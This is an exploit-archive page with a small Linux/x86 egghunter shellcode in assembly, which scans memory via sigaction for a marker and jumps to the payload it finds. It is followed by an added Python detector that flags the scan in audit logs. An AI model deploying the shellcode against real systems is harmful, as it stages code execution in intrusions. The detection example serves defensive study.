Exploits / Vulnerability Discovered: 2018-09-20
Type: shellcode
Platform: linux_x86
This exploit / vulnerability, Linux/x86 egghunter (0x50905090) + sigaction() shellcode (27 bytes), is for educational purposes only; if you use it, you do so at your own risk!
[+] Code ...
/*
# Title: Linux/x86 - Egghunter + sigaction-based Shellcode (27 bytes)
# Author: Valbrux
# Date: 2018-09-19
# This exploit is a dirty-slow but small version of the sigaction-based egg hunter shellcode
global _start
section .text
;zeroing ecx
xor ecx,ecx
_start:
;increment
inc ecx
;sigaction syscall number
push byte 67
pop eax
;executing syscall
int 0x80
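;if EFAULT (-14, low byte 0xf2) the address is not readable
cmp al,0xf2
;try the next address (no page skipping in this version, hence slow)
jz _start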
;moving EGG
mov eax,0x50905090
;current address
mov edi,ecx
;checking current address with EGG two times
scasd
jnz _start
scasd
jnz _start
;if equals jump to shellcode
jmp edi
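
A defender-side view of the scan loop above, as an added example that is not part of the original listing or the author's code: the hunter calls sigaction (syscall 67) with a pointer that rises by one per iteration and loops on EFAULT, so it appears as a long run of failed calls with sequential pointers from one process. The audit-style records, the pids, the `find_scanners` name and its threshold are constructed assumptions, and the example presumes SYSCALL audit records for the process are being collected.

```python
import re
from collections import defaultdict

FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')

def _rec(seq, pid, a1, exit_code):
    # Constructed record in Linux audit SYSCALL style (not from the page).
    # arch=40000003 is i386, syscall=67 is sigaction, a1 is the 'act' pointer (ecx).
    ok = "yes" if exit_code >= 0 else "no"
    return (f'type=SYSCALL msg=audit(1537400000.000:{seq}): arch=40000003 '
            f'syscall=67 success={ok} exit={exit_code} a0=0 a1={a1:x} a2=0 a3=0 '
            f'pid={pid} comm="demo"')

# Constructed sample: pid 100 is ordinary signal setup, pid 4242 walks memory
# one byte at a time and gets EFAULT (-14) on every unmapped address.
SAMPLE_LOG = (
    [_rec(1, 100, 0xBFFFF000, 0)]
    + [_rec(2 + i, 4242, 0x1000 + i, -14) for i in range(300)]
    + [_rec(400, 100, 0xBFFFF010, 0), _rec(401, 100, 0xDEAD0000, -14)]
)

def find_scanners(lines, min_run=64):
    """Return {pid: longest run of EFAULT sigaction calls whose pointer rose by 1}."""
    last, run, best = {}, defaultdict(int), defaultdict(int)
    for line in lines:
        f = dict(FIELD.findall(line))
        if (f.get("type"), f.get("arch"), f.get("syscall")) != ("SYSCALL", "40000003", "67"):
            continue
        pid, addr = f["pid"], int(f["a1"], 16)
        efault = f.get("exit") == "-14"
        if efault and last.get(pid) == addr - 1:
            run[pid] += 1          # same process, next byte, still unreadable
        else:
            run[pid] = 1 if efault else 0
        last[pid] = addr
        best[pid] = max(best[pid], run[pid])
    return {pid: n for pid, n in best.items() if n >= min_run}

if __name__ == "__main__":
    for pid, n in find_scanners(SAMPLE_LOG).items():
        print(f"pid {pid}: {n} sequential EFAULT sigaction calls")
```

A single failed sigaction, like the last record for pid 100, stays well under the threshold; only the sustained byte-by-byte run is reported.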